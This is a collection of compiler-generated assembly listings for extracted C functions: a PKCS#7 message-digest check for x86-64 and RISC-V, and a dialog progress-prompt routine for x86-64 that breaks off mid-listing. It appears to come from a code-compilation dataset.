.file "extr_pkcs7_verify.c_pkcs7_digest_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string ",%u,%s" .LC1: .string "MsgDigest = [%*ph]\n" .LC2: .string "Sig %u: No messageDigest\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC3: .string "Sig %u: Invalid digest size (%u)\n" .align 8 .LC4: .string "Sig %u: Message digest doesn't match\n" .section .rodata.str1.1 .LC5: .string "AADigest = [%*ph]\n" .LC6: .string " = %d" .text .p2align 4 .type pkcs7_digest, @function pkcs7_digest: .LFB1: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 movq %rdi, %r13 leaq .LC0(%rip), %rdi pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 movq %rsi, %rbx subq $24, %rsp .cfi_def_cfa_offset 80 movq 24(%rsi), %rbp movl 16(%rsi), %esi movq %fs:40, %rax movq %rax, 8(%rsp) xorl %eax, %eax movl 16(%rbp), %edx call kenter@PLT cmpq $0, 8(%rbp) jne .L14 movq 24(%rbx), %rax movl 16(%rax), %edi testl %edi, %edi jne .L3 .L22: movl ENOPKG(%rip), %r12d negl %r12d .L1: movq 8(%rsp), %rax subq %fs:40, %rax jne .L23 addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 movl %r12d, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L3: .cfi_restore_state xorl %edx, %edx xorl %esi, %esi call crypto_alloc_shash@PLT movq %rax, %rdi movq %rax, %r14 call IS_ERR@PLT movq %r14, %rdi testq %rax, %rax jne .L25 call crypto_shash_descsize@PLT movq %r14, %rdi movl %eax, %r15d call crypto_shash_digestsize@PLT movl GFP_KERNEL(%rip), %esi movl ENOMEM(%rip), %r12d movq %rax, 0(%rbp) movq %rax, %rdi negl %r12d call kmalloc@PLT movq %rax, 8(%rbp) testq %rax, %rax jne .L26 .L7: movq %r14, %rdi call crypto_free_shash@PLT movl %r12d, %esi leaq .LC6(%rip), %rdi call kleave@PLT jmp .L1 .p2align 4,,10 .p2align 3 .L14: xorl %r12d, %r12d jmp .L1 .p2align 4,,10 .p2align 3 .L26: movslq %r15d, %rdi movl GFP_KERNEL(%rip), %esi addq $8, %rdi call kzalloc@PLT movq %rax, %r15 testq %rax, %rax je .L7 movq 8(%rbp), %rcx movl 4(%r13), %esi movq %r14, (%rax) movq %rax, %rdi movl 0(%r13), %edx call crypto_shash_digest@PLT movl %eax, %r12d testl %eax, %eax js .L8 movq 8(%rbp), %rdx movl $8, %esi leaq .LC1(%rip), %rdi call pr_devel@PLT movl 12(%rbx), %eax testl %eax, %eax je .L8 movl 20(%rbx), %esi testl %esi, %esi je .L27 movq (%rbx), %rdx cmpq 0(%rbp), %rdx je .L11 movl 16(%rbx), %esi leaq .LC3(%rip), %rdi xorl %eax, %eax call pr_debug@PLT movl EBADMSG(%rip), %r12d negl %r12d .p2align 4,,10 .p2align 3 .L8: movq %r15, %rdi call kfree@PLT jmp .L7 .p2align 4,,10 .p2align 3 .L25: call PTR_ERR@PLT addl ENOENT(%rip), %eax je .L22 movq 8(%rsp), %rax subq %fs:40, %rax jne .L23 addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 movq %r14, %rdi popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 jmp PTR_ERR@PLT .L11: .cfi_restore_state movq 8(%rbp), %rdi call memcmp@PLT testq %rax, %rax jne .L28 movq 8(%rbp), %rdi movq 0(%rbp), %rdx xorl %esi, %esi call memset@PLT movq %r15, %rdi call crypto_shash_init@PLT movl %eax, %r12d testl %eax, %eax js .L8 movl ASN1_CONS_BIT(%rip), %eax leaq 4(%rsp), %rsi movl $1, %edx movq %r15, %rdi orl ASN1_SET(%rip), %eax movl %eax, 4(%rsp) call crypto_shash_update@PLT movl %eax, %r12d testl %eax, %eax js .L8 movq 8(%rbp), %rcx movl 8(%rbx), %edx movq %r15, %rdi movl 12(%rbx), %esi call crypto_shash_finup@PLT movl %eax, %r12d testl %eax, %eax js .L8 movq 8(%rbp), %rdx movl $8, %esi leaq .LC5(%rip), %rdi call pr_devel@PLT jmp .L8 .L27: movl 16(%rbx), %esi leaq .LC2(%rip), %rdi call pr_warn@PLT movl EKEYREJECTED(%rip), %r12d negl %r12d jmp .L8 .L28: movl 16(%rbx), %esi leaq .LC4(%rip), %rdi xorl %eax, %eax call pr_debug@PLT movl EKEYREJECTED(%rip), %r12d negl %r12d jmp .L8 .L23: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size pkcs7_digest, .-pkcs7_digest .globl GFP_KERNEL .bss .align 4 .type GFP_KERNEL, @object .size GFP_KERNEL, 4 GFP_KERNEL: .zero 4 .globl ENOPKG .align 4 .type ENOPKG, @object .size ENOPKG, 4 ENOPKG: .zero 4 .globl ENOMEM .align 4 .type ENOMEM, @object .size ENOMEM, 4 ENOMEM: .zero 4 .globl ENOENT .align 4 .type ENOENT, @object .size ENOENT, 4 ENOENT: .zero 4 .globl EKEYREJECTED .align 4 .type EKEYREJECTED, @object .size EKEYREJECTED, 4 EKEYREJECTED: .zero 4 .globl EBADMSG .align 4 .type EBADMSG, @object .size EBADMSG, 4 EBADMSG: .zero 4 .globl ASN1_SET .align 4 .type ASN1_SET, @object .size ASN1_SET, 4 ASN1_SET: .zero 4 .globl ASN1_CONS_BIT .align 4 .type ASN1_CONS_BIT, @object .size ASN1_CONS_BIT, 4 ASN1_CONS_BIT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_pkcs7_verify.c_pkcs7_digest_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string ",%u,%s" .align 3 .LC1: .string "MsgDigest = [%*ph]\n" .align 3 .LC2: .string "Sig %u: No messageDigest\n" .align 3 .LC3: .string "Sig %u: Invalid digest size (%u)\n" .align 3 .LC4: .string "Sig %u: Message digest doesn't match\n" .align 3 .LC5: .string "AADigest = [%*ph]\n" .align 3 .LC6: .string " = %d" .text .align 1 .type pkcs7_digest, @function pkcs7_digest: addi sp,sp,-96 sd s4,48(sp) ld s4,24(a1) sd s0,80(sp) mv s0,a1 lw a2,16(s4) lw a1,16(a1) sd s2,64(sp) la s2,__stack_chk_guard sd s5,40(sp) ld a5, 0(s2) sd a5, 8(sp) li a5, 0 mv s5,a0 lla a0,.LC0 sd ra,88(sp) sd s1,72(sp) sd s3,56(sp) sd s6,32(sp) sd s7,24(sp) call kenter@plt ld a5,8(s4) bne a5,zero,.L14 ld a5,24(s0) lw a0,16(a5) bne a0,zero,.L3 lw s1,.LANCHOR0 negw s1,s1 .L2: ld a4, 8(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L25 ld ra,88(sp) ld s0,80(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) ld s6,32(sp) ld s7,24(sp) mv a0,s1 ld s1,72(sp) addi sp,sp,96 jr ra .L3: li a2,0 li a1,0 call crypto_alloc_shash@plt mv s3,a0 call IS_ERR@plt bne a0,zero,.L27 mv a0,s3 call crypto_shash_descsize@plt mv s7,a0 mv a0,s3 call crypto_shash_digestsize@plt lla s6,.LANCHOR0 lw a1,12(s6) lw s1,8(s6) sd a0,0(s4) call kmalloc@plt sd a0,8(s4) negw s1,s1 bne a0,zero,.L28 .L7: mv a0,s3 call crypto_free_shash@plt mv a1,s1 lla a0,.LC6 call kleave@plt j .L2 .L14: li s1,0 j .L2 .L28: lw a1,12(s6) addi a0,s7,8 call kzalloc@plt mv s7,a0 beq a0,zero,.L7 ld a3,8(s4) lw a2,0(s5) lw a1,4(s5) sd s3,0(a0) call crypto_shash_digest@plt mv s1,a0 blt a0,zero,.L8 ld a2,8(s4) li a1,8 lla a0,.LC1 call pr_devel@plt lw a5,12(s0) beq a5,zero,.L8 lw a1,20(s0) beq a1,zero,.L29 ld a2,0(s0) ld a5,0(s4) beq a2,a5,.L11 lw a1,16(s0) lla a0,.LC3 call pr_debug@plt lw s1,20(s6) negw s1,s1 .L8: mv a0,s7 call kfree@plt j .L7 .L27: mv a0,s3 call PTR_ERR@plt lla a4,.LANCHOR0 lw a5,4(a4) negw a5,a5 bne a5,a0,.L5 lw s1,0(a4) negw s1,s1 j .L2 .L5: ld a4, 8(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L25 ld s0,80(sp) ld ra,88(sp) ld s1,72(sp) ld s2,64(sp) ld s4,48(sp) ld s5,40(sp) ld s6,32(sp) ld s7,24(sp) mv a0,s3 ld s3,56(sp) addi sp,sp,96 tail PTR_ERR@plt .L11: ld a0,8(s4) call memcmp@plt bne a0,zero,.L30 ld a2,0(s4) ld a0,8(s4) li a1,0 call memset@plt mv a0,s7 call crypto_shash_init@plt mv s1,a0 blt a0,zero,.L8 lw a5,24(s6) lw a4,28(s6) li a2,1 addi a1,sp,4 or a5,a5,a4 mv a0,s7 sw a5,4(sp) call crypto_shash_update@plt mv s1,a0 blt a0,zero,.L8 ld a3,8(s4) lw a2,8(s0) lw a1,12(s0) mv a0,s7 call crypto_shash_finup@plt mv s1,a0 blt a0,zero,.L8 ld a2,8(s4) li a1,8 lla a0,.LC5 call pr_devel@plt j .L8 .L29: lw a1,16(s0) lla a0,.LC2 call pr_warn@plt lw s1,16(s6) negw s1,s1 j .L8 .L30: lw a1,16(s0) lla a0,.LC4 call pr_debug@plt lw s1,16(s6) negw s1,s1 j .L8 .L25: call __stack_chk_fail@plt .size pkcs7_digest, .-pkcs7_digest .globl GFP_KERNEL .globl ENOPKG .globl ENOMEM .globl ENOENT .globl EKEYREJECTED .globl EBADMSG .globl ASN1_SET .globl ASN1_CONS_BIT .bss .align 2 .set .LANCHOR0,. + 0 .type ENOPKG, @object .size ENOPKG, 4 ENOPKG: .zero 4 .type ENOENT, @object .size ENOENT, 4 ENOENT: .zero 4 .type ENOMEM, @object .size ENOMEM, 4 ENOMEM: .zero 4 .type GFP_KERNEL, @object .size GFP_KERNEL, 4 GFP_KERNEL: .zero 4 .type EKEYREJECTED, @object .size EKEYREJECTED, 4 EKEYREJECTED: .zero 4 .type EBADMSG, @object .size EBADMSG, 4 EBADMSG: .zero 4 .type ASN1_CONS_BIT, @object .size ASN1_CONS_BIT, 4 ASN1_CONS_BIT: .zero 4 .type ASN1_SET, @object .size ASN1_SET, 4 ASN1_SET: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_dprompt.c_dprompt_add_files_aug_v3_6
.file "extr_dprompt.c_dprompt_add_files_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "\\Zn" .LC1: .string "\\Zb" .LC2: .string "" .LC3: .string " [\\Z%c%s%-*s%s%-*s\\Zn]\\n" .LC4: .string " [%-*s%s%-*s]\\n" .LC5: .string "\\Zr\\Z1" .LC6: .string "\\Zr\\Z2" .LC7: .string "%*s%3u%%%*s" .LC8: .string "\\Z%c\\Zr\\Z%c%s%s%s\\Zn" .LC9: .string "\\ZR" .LC10: .string "%s" .LC11: .string "..." .LC12: .string "%s%-*s%s %c" .LC13: .string " " .LC14: .string "%-*s%s %s" .LC15: .string " [%s]\\n" .LC16: .string " \\n" .LC17: .string "\n" .text .p2align 4 .type dprompt_add_files, @function dprompt_add_files: .LFB0: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 pushq %r15 pushq %r14 pushq %r13 pushq %r12 .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 movl %edx, %r12d pushq %rbx .cfi_offset 3, -56 movq %rdi, %rbx subq $104, %rsp movq %rsi, -112(%rbp) movq %rsp, %rcx movq %fs:40, %rax movq %rax, -56(%rbp) xorl %eax, %eax testq %rsi, %rsi movq FALSE(%rip), %rax cmove TRUE(%rip), %rax movq %rax, -120(%rbp) movl FLABEL_MAX(%rip), %eax addl $1, %eax cltq addq $15, %rax movq %rax, %rdx andq $-4096, %rax subq %rax, %rcx andq $-16, %rdx cmpq %rcx, %rsp je .L5 .L125: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rcx, %rsp jne .L125 .L5: andl $4095, %edx subq %rdx, %rsp testq %rdx, %rdx jne .L126 .L6: movl pbar_size(%rip), %eax movq %rsp, %rsi movq %rsp, %r14 leal 16(%rax), %r15d movslq %r15d, %rdx addq $15, %rdx movq %rdx, %rdi movq %rdx, %rcx andq $-4096, %rdi andq $-16, %rcx subq %rdi, %rsi cmpq %rsi, %rsp je .L8 .L127: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rsi, %rsp jne .L127 .L8: andl $4095, %ecx subq %rcx, %rsp testq %rcx, %rcx jne .L128 .L9: movq %rdx, %rdi movq %rsp, %rsi movq %rdx, %rcx movq %rsp, -144(%rbp) andq $-4096, %rdi andq $-16, %rcx subq %rdi, %rsi cmpq %rsi, %rsp je .L11 .L129: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rsi, %rsp jne .L129 .L11: andl $4095, %ecx subq %rcx, %rsp testq %rcx, %rcx je .L12 orq $0, -8(%rsp,%rcx) .L12: movq %rdx, %rcx movq %rsp, %rsi andq $-4096, %rdx movq %rsp, -128(%rbp) subq %rdx, %rsi andq $-16, %rcx cmpq %rsi, %rsp je .L14 .L130: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rsi, %rsp jne .L130 .L14: movq %rcx, %rdx andl $4095, %edx subq %rdx, %rsp testq %rdx, %rdx je .L15 orq $0, -8(%rsp,%rdx) .L15: cmpq $0, use_colors(%rip) movq %rsp, -104(%rbp) je .L67 cmpq $0, use_shadow(%rip) je .L67 movq gauge_color(%rip), %rdx movzbl 2(%rdx), %edi movzbl (%rdx), %r13d movb %dil, -135(%rbp) .L16: movq -144(%rbp), %rdi movb $0, (%rdi) movl %eax, %edi orl %r12d, %edi js .L18 movq -112(%rbp), %rdi testq %rdi, %rdi je .L18 cmpq $0, (%rdi) jns .L20 cmpq $0, dialog_test(%rip) je .L18 .L20: leal 1(%rax), %esi movl pct_rsize(%rip), %eax leaq .LC2(%rip), %r8 movq pct_lsize(%rip), %rcx pushq %r8 movq -144(%rbp), %rdi movl %r12d, %r9d leaq .LC7(%rip), %rdx pushq %rax xorl %eax, %eax call snprintf@PLT cmpq $0, use_color(%rip) popq %r8 popq %r9 je .L18 movl pbar_size(%rip), %edx imull %r12d, %edx movslq %edx, %rax movl %edx, %esi imulq $1374389535, %rax, %rax sarl $31, %esi sarq $37, %rax subl %esi, %eax movq -144(%rbp), %rsi movl %eax, %ecx imull $100, %eax, %eax subl %eax, %edx xorl %eax, %eax cmpl $50, %edx movq -128(%rbp), %rdx setg %al subl %eax, %ecx movq -104(%rbp), %rax movb $0, (%rdx) movl dwidth(%rip), %edx movl %ecx, -132(%rbp) movb $0, (%rax) movq %rax, %rdi call strncat@PLT movslq -132(%rbp), %rax movq -104(%rbp), %rdx movq -144(%rbp), %rdi movb $0, (%rdx,%rax) movl dwidth(%rip), %edx leaq (%rdi,%rax), %rsi movq -128(%rbp), %rdi call strncat@PLT pushq -128(%rbp) movq -104(%rbp), %r9 movl %r15d, %esi leaq .LC9(%rip), %rax movq -144(%rbp), %rdi movsbl %r13b, %r8d leaq .LC8(%rip), %rdx pushq %rax movsbl -135(%rbp), %ecx xorl %eax, %eax call snprintf@PLT popq %rsi popq %rdi .p2align 4,,10 .p2align 3 .L18: testq %rbx, %rbx je .L68 movl $0, -104(%rbp) cmpl $99, %r12d movl $0, -132(%rbp) movq $0, -128(%rbp) setle -133(%rbp) .p2align 4,,10 .p2align 3 .L62: addl $1, -104(%rbp) cmpq $0, use_dialog(%rip) movl label_size(%rip), %r12d movq 8(%rbx), %r15 jne .L131 .L23: movq -128(%rbp), %rsi movq %r15, %rdi call dialog_prompt_numlines@PLT movl $1, %esi movq %r15, %rdi addl %eax, -132(%rbp) call dialog_prompt_lastline@PLT movq %rax, %r13 cmpq %rax, %r15 je .L24 movzbl (%rax), %edx movb $0, (%rax) movq %r15, %rsi leaq .LC10(%rip), %rdi xorl %eax, %eax movb %dl, -134(%rbp) call dprompt_add@PLT movzbl -134(%rbp), %edx movb %dl, 0(%r13) .L24: movq use_dialog(%rip), %rax orq use_libdialog(%rip), %rax je .L25 cmpq $0, use_color(%rip) jne .L132 .L25: movl pbar_size(%rip), %ecx testl %ecx, %ecx js .L133 .L29: leal 1(%r12), %r15d xorl %eax, %eax movq %r13, %rcx movq %r14, %rdi leaq .LC10(%rip), %rdx movl %r15d, %esi call snprintf@PLT cmpl %r12d, %eax jg .L134 .L30: cmpq %rbx, -112(%rbp) sete %r13b andb -133(%rbp), %r13b jne .L135 cmpq $0, use_color(%rip) movq %r14, %rdx movl %r12d, %esi leaq .LC0(%rip), %rax leaq .LC2(%rip), %rcx cmovne %rax, %rcx leaq .LC13(%rip), %r8 leaq .LC14(%rip), %rdi xorl %eax, %eax call dprompt_add@PLT .L34: movq 16(%rbx), %r9 movq 24(%rbx), %rcx movl $134, %eax testq %r9, %r9 je .L136 .L36: movq use_color(%rip), %rdx leaq .LC3(%rip), %r12 leaq .LC4(%rip), %rsi testq %rdx, %rdx cmove %rsi, %r12 cmpq %rcx, DPV_STATUS_FAILED(%rip) je .L137 movl done_lsize(%rip), %esi movl done_rsize(%rip), %r8d leaq .LC6(%rip), %r13 movq done(%rip), %rcx .L43: addl $-128, %eax cmpl $6, %eax ja .L44 leaq .L46(%rip), %rdi movslq (%rdi,%rax,4), %rax addq %rdi, %rax notrack jmp *%rax .section .rodata .align 4 .align 4 .L46: .long .L51-.L46 .long .L50-.L46 .long .L44-.L46 .long .L49-.L46 .long .L48-.L46 .long .L47-.L46 .long .L45-.L46 .text .L126: orq $0, -8(%rsp,%rdx) jmp .L6 .L128: orq $0, -8(%rsp,%rcx) jmp .L9 .p2align 4,,10 .p2align 3 .L45: movl PROMPT_MAX(%rip), %eax movq msg(%rip), %rdi leaq .LC10(%rip), %rdx movq %r9, %rcx leal 1(%rax), %esi xorl %eax, %eax call snprintf@PLT movq msg(%rip), %rdi call strlen@PLT movslq pbar_size(%rip), %rdx movl %eax, mesg_size(%rip) cmpl %edx, %eax jle .L56 movq msg(%rip), %rax movl $0, mesg_rsize(%rip) movl $0, mesg_lsize(%rip) movb $0, (%rax,%rdx) movl pbar_size(%rip), %eax movl mesg_rsize(%rip), %r8d movl mesg_lsize(%rip), %esi movl %eax, mesg_size(%rip) .L57: cmpq $0, use_color(%rip) movq msg(%rip), %rcx je .L59 .L123: leaq .LC2(%rip), %rdi movsbl -135(%rbp), %eax movq %rcx, %r9 pushq %rdi pushq %r8 .L122: movq %rdi, %r8 movl %esi, %ecx movq %r13, %rdx movl %eax, %esi movq %r12, %rdi xorl %eax, %eax call dprompt_add@PLT popq %rax popq %rdx .L52: movl -104(%rbp), %eax cmpl %eax, display_limit(%rip) jle .L22 movq -120(%rbp), %rax cmpq %rbx, -112(%rbp) movq 40(%rbx), %rbx cmove TRUE(%rip), %rax movq %rax, -120(%rbp) testq %rbx, %rbx jne .L62 .L22: movl -132(%rbp), %eax cmpl fheight(%rip), %eax leaq .LC17(%rip), %rbx movl -132(%rbp), %r12d jge .L1 .p2align 4,,10 .p2align 3 .L63: xorl %eax, %eax movq %rbx, %rdi addl $1, %r12d call dprompt_add@PLT cmpl %r12d, fheight(%rip) jg .L63 .L1: movq -56(%rbp), %rax subq %fs:40, %rax jne .L138 movl -104(%rbp), %eax leaq -40(%rbp), %rsp popq %rbx popq %r12 popq %r13 popq %r14 popq %r15 popq %rbp .cfi_remember_state .cfi_def_cfa 7, 8 ret .p2align 4,,10 .p2align 3 .L47: .cfi_restore_state movl pbar_size(%rip), %eax movl 32(%rbx), %edx leaq -96(%rbp), %r15 leaq .LC2(%rip), %rcx movl HN_AUTOSCALE(%rip), %r8d movl HN_NOSPACE(%rip), %r9d movq %r15, %rdi leal 2(%rax), %esi orl HN_DIVISOR_1000(%rip), %r9d call humanize_number@PLT movq %r15, %rdi call strlen@PLT movl pbar_size(%rip), %edx xorl %r8d, %r8d movl %edx, %ecx subl %eax, %ecx movl %ecx, %esi shrl $31, %esi addl %ecx, %esi sarl %esi leal (%rax,%rsi,2), %eax cmpl %eax, %edx setne %r8b addl %esi, %r8d cmpq $0, use_color(%rip) je .L55 leaq .LC2(%rip), %rdi movsbl -135(%rbp), %eax movq %r15, %r9 pushq %rdi pushq %r8 jmp .L122 .p2align 4,,10 .p2align 3 .L50: movq -144(%rbp), %rsi leaq .LC15(%rip), %rdi xorl %eax, %eax call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L48: testq %rdx, %rdx jne .L123 .L59: leaq .LC2(%rip), %r9 movq %r12, %rdi xorl %eax, %eax movq %r9, %rdx call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L49: movl pbar_size(%rip), %esi testq %rdx, %rdx je .L60 leaq .LC2(%rip), %rdi movsbl -135(%rbp), %eax pushq %rdi movq %rdi, %r9 pushq $0 jmp .L122 .p2align 4,,10 .p2align 3 .L51: leaq .LC2(%rip), %r9 movl pend_rsize(%rip), %r8d xorl %eax, %eax movl pend(%rip), %ecx movl pend_lsize(%rip), %esi movq %r9, %rdx leaq .LC4(%rip), %rdi call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L44: leaq .LC16(%rip), %rdi xorl %eax, %eax call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L133: movl FLABEL_MAX(%rip), %eax subl $1, %eax cmpl %r12d, %eax jle .L29 movq FALSE(%rip), %rax cmpq %rax, no_labels(%rip) jne .L29 addl $2, %r12d jmp .L29 .p2align 4,,10 .p2align 3 .L137: movl fail_lsize(%rip), %esi movl fail_rsize(%rip), %r8d leaq .LC5(%rip), %r13 movq fail(%rip), %rcx jmp .L43 .p2align 4,,10 .p2align 3 .L134: movslq %r12d, %rax leaq .LC11(%rip), %rsi leaq -3(%r14,%rax), %rdi call sprintf@PLT jmp .L30 .p2align 4,,10 .p2align 3 .L135: movq %r14, %rdi call strlen@PLT movslq %r12d, %rdx movslq %eax, %rdi addq %r14, %rdx addq %r14, %rdi cmpq %rdx, %rdi jb .L139 .L32: xorl %eax, %eax call spin_char@PLT cmpq $0, use_color(%rip) movq %r14, %rcx movl %r12d, %edx movl %eax, %r9d leaq .LC0(%rip), %r8 leaq .LC2(%rip), %rax leaq .LC1(%rip), %rsi cmove %rax, %r8 leaq .LC12(%rip), %rdi cmove %rax, %rsi xorl %eax, %eax call dprompt_add@PLT jmp .L34 .p2align 4,,10 .p2align 3 .L131: movl pprompt(%rip), %edi call dialog_prompt_nlstate@PLT movq %rax, -128(%rbp) jmp .L23 .p2align 4,,10 .p2align 3 .L136: movl pbar_size(%rip), %edx movl $130, %eax testl %edx, %edx js .L36 movl $131, %eax cmpl $3, %edx jle .L36 cmpq $0, -120(%rbp) movl $128, %eax jne .L36 cmpq %rbx, -112(%rbp) je .L140 cmpq $0, dialog_test(%rip) movl $132, %eax jne .L36 movq (%rbx), %rax shrq $63, %rax addl $132, %eax jmp .L36 .p2align 4,,10 .p2align 3 .L132: movzbl 0(%r13), %edx testb %dl, %dl je .L26 movq %r13, %rax jmp .L28 .p2align 4,,10 .p2align 3 .L69: movl %ecx, %edx .L27: movq %rsi, %rax testb %dl, %dl je .L26 .L28: movzbl 1(%rax), %ecx leaq 1(%rax), %rsi cmpb $92, %dl jne .L69 testb %cl, %cl jne .L141 .L26: movl FLABEL_MAX(%rip), %eax cmpl %eax, %r12d cmovg %eax, %r12d jmp .L25 .p2align 4,,10 .p2align 3 .L141: movzbl 2(%rax), %edx leaq 2(%rax), %rsi cmpb $90, %cl jne .L27 testb %dl, %dl je .L26 movzbl 3(%rax), %edx addl $3, %r12d leaq 3(%rax), %rsi jmp .L27 .p2align 4,,10 .p2align 3 .L139: movl %r15d, %esi leaq .LC11(%rip), %rdx subl %eax, %esi xorl %eax, %eax call snprintf@PLT jmp .L32 .p2align 4,,10 .p2align 3 .L67: movb $98, -135(%rbp) movl $52, %r13d jmp .L16 .p2align 4,,10 .p2align 3 .L55: leaq .LC2(%rip), %r9 movq %r15, %rcx movq %r12, %rdi xorl %eax, %eax movq %r9, %rdx call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L60: leaq .LC2(%rip), %r9 xorl %r8d, %r8d movq %r12, %rdi xorl %eax, %eax movq %r9, %rcx movq %r9, %rdx call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L56: movl %edx, %esi subl %eax, %esi sarl %esi leal (%rax,%rsi,2), %eax movl %esi, mesg_lsize(%rip) cmpl %eax, %edx je .L142 leal 1(%rsi), %r8d movl %r8d, mesg_rsize(%rip) jmp .L57 .p2align 4,,10 .p2align 3 .L142: movl %esi, mesg_rsize(%rip) movl %esi, %r8d jmp .L57 .L140: movq -144(%rbp), %rax cmpb $0, (%rax) jne .L38 movq -112(%rbp), %rdi movl $133, %eax cmpq $0, (%rdi) js .L36 xorl %eax, %eax cmpq %rcx, DPV_STATUS_RUNNING(%rip) sete %al addl $132, %eax jmp .L36 .L38: cmpq $0, dialog_test(%rip) je .L39 cmpb $1, %r13b sbbl %eax, %eax andl $3, %eax addl $129, %eax jmp .L36 .L68: movl $0, -104(%rbp) movl $0, -132(%rbp) jmp .L22 .L39: movq -112(%rbp), %rax movq (%rax), %rdx movq %rdx, %rax shrq $63, %rax addl $132, %eax cmpq %rcx, DPV_STATUS_RUNNING(%rip) jne .L36 movq %rdx, %rax sarq $63, %rax andl $4, %eax addl $129, %eax jmp .L36 .L138: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size dprompt_add_files, .-dprompt_add_files .globl use_shadow .bss .align 8 .type use_shadow, @object .size use_shadow, 8 use_shadow: .zero 8 .globl use_libdialog .align 8 .type use_libdialog, @object .size use_libdialog, 8 use_libdialog: .zero 8 .globl use_dialog .align 8 .type use_dialog, @object .size use_dialog, 8 use_dialog: .zero 8 .globl use_colors .align 8 .type use_colors, @object .size use_colors, 8 use_colors: .zero 8 .globl use_color .align 8 .type use_color, @object .size use_color, 8 use_color: .zero 8 .globl pprompt .align 4 .type pprompt, @object .size pprompt, 4 pprompt: .zero 4 .globl pend_rsize .align 4 .type pend_rsize, @object .size pend_rsize, 4 pend_rsize: .zero 4 .globl pend_lsize .align 4 .type pend_lsize, @object .size pend_lsize, 4 pend_lsize: .zero 4 .globl pend .align 4 .type pend, @object .size pend, 4 pend: .zero 4 .globl pct_rsize .align 4 .type pct_rsize, @object .size pct_rsize, 4 pct_rsize: .zero 4 .globl pct_lsize .align 8 .type pct_lsize, @object .size pct_lsize, 8 pct_lsize: .zero 8 .globl pbar_size .align 4 .type pbar_size, @object .size pbar_size, 4 pbar_size: .zero 4 .globl no_labels .align 8 .type no_labels, @object .size no_labels, 8 no_labels: .zero 8 .globl msg .align 8 .type msg, @object .size msg, 8 msg: .zero 8 .globl mesg_size .align 4 .type mesg_size, @object .size mesg_size, 4 mesg_size: .zero 4 .globl mesg_rsize .align 4 .type mesg_rsize, @object .size mesg_rsize, 4 mesg_rsize: .zero 4 .globl mesg_lsize .align 4 .type mesg_lsize, @object .size mesg_lsize, 4 mesg_lsize: .zero 4 .globl label_size .align 4 .type label_size, @object .size label_size, 4 label_size: .zero 4 .globl gauge_color .align 8 .type gauge_color, @object .size gauge_color, 8 gauge_color: .zero 8 .globl fheight .align 4 .type fheight, @object .size fheight, 4 fheight: .zero 4 .globl fail_rsize .align 4 .type fail_rsize, @object .size fail_rsize, 4 fail_rsize: .zero 4 .globl fail_lsize .align 4 .type fail_lsize, @object .size fail_lsize, 4 fail_lsize: .zero 4 .globl fail .align 8 .type fail, @object .size fail, 8 fail: .zero 8 .globl dwidth .align 4 .type dwidth, @object .size dwidth, 4 dwidth: .zero 4 .globl done_rsize .align 4 .type done_rsize, @object .size done_rsize, 4 done_rsize: .zero 4 .globl done_lsize .align 4 .type done_lsize, @object .size done_lsize, 4 done_lsize: .zero 4 .globl done .align 8 .type done, @object .size done, 8 done: .zero 8 .globl display_limit .align 4 .type display_limit, @object .size display_limit, 4 display_limit: .zero 4 .globl dialog_test .align 8 .type dialog_test, @object .size dialog_test, 8 dialog_test: .zero 8 .globl TRUE .align 8 .type TRUE, @object .size TRUE, 8 TRUE: .zero 8 .globl PROMPT_MAX .align 4 .type PROMPT_MAX, @object .size PROMPT_MAX, 4 PROMPT_MAX: .zero 4 .globl HN_NOSPACE .align 4 .type HN_NOSPACE, @object .size HN_NOSPACE, 4 